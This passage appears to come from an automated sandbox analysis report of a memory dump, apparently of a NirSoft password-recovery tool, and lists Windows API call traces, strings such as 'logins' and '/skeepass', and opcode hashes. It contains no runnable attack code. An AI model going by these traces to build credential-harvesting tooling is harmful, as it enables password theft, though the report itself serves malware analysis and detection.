                                                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                    • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                                                  • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                  • String ID: logins$null
                                                                                                                  • API String ID: 2148543256-2163367763
                                                                                                                  • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                  • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                                                  • memset.MSVCRT ref: 00408606
                                                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                  • String ID: ---
                                                                                                                  • API String ID: 3437578500-2854292027
                                                                                                                  • Opcode ID: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                  • Opcode Fuzzy Hash: 514a4b219222fc308ac2af9ebc5a2bc9af16dfffa76d3dbf40f60a33dc7994f2
                                                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                                                  • memset.MSVCRT ref: 00410892
                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1010922700-0
                                                                                                                  • Opcode ID: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                  • Opcode Fuzzy Hash: 6697d86bd39682251f5c1914ef9d5b2959c55de28960e84646fd269688f34b04
                                                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                                                  • free.MSVCRT ref: 004186C7
                                                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                  • free.MSVCRT ref: 004186E0
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                  • free.MSVCRT ref: 00418716
                                                                                                                  • free.MSVCRT ref: 0041872A
                                                                                                                  • free.MSVCRT ref: 00418749
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$FullNamePath$malloc$Version
                                                                                                                  • String ID: |A
                                                                                                                  • API String ID: 3356672799-1717621600
                                                                                                                  • Opcode ID: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                  • Opcode Fuzzy Hash: b0cf0f28ee59a6f388034fbf15bd1e2dfba9e494de547d4b72c81ace4a10eec1
                                                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsicmp
                                                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                  • API String ID: 2081463915-1959339147
                                                                                                                  • Opcode ID: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                  • Opcode Fuzzy Hash: ed70c74fadb10ab7d72ef9915f44c0908033a9cd6b37cdcdb0b46a34d9d8d060
                                                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                  • API String ID: 2012295524-70141382
                                                                                                                  • Opcode ID: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                  • Opcode Fuzzy Hash: 95a5228713fab25b9356939e1698f0342648b454f81c78f9b3678221df1ca411
                                                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                  • API String ID: 667068680-3953557276
                                                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                  APIs
                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1700100422-0
                                                                                                                  • Opcode ID: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                  • Opcode Fuzzy Hash: 982738172b7671ed7e60757921d653f6822ff96d67897b30d29685b1d4afaeae
                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                  APIs
                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 552707033-0
                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                  • String ID: 4$h
                                                                                                                  • API String ID: 4066021378-1856150674
                                                                                                                  • Opcode ID: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                  • Opcode Fuzzy Hash: 71bd764b9dcf29740d9000bfd46b6f343dec630bed034bbd58b4fa538d0cb68c
                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                  • String ID: %%0.%df
                                                                                                                  • API String ID: 3473751417-763548558
                                                                                                                  • Opcode ID: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                  • Opcode Fuzzy Hash: 2b153c1cf1109f668433ad91a4c4fbef48d688dda569af0dd2d123790ad71e5e
                                                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                  APIs
                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                  • String ID: A
                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                  APIs
                                                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                  • String ID: caption
                                                                                                                  • API String ID: 973020956-4135340389
                                                                                                                  • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                  • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000089.00000002.36340344762.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 00000089.00000002.36340344762.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_snwprintf$wcscpy
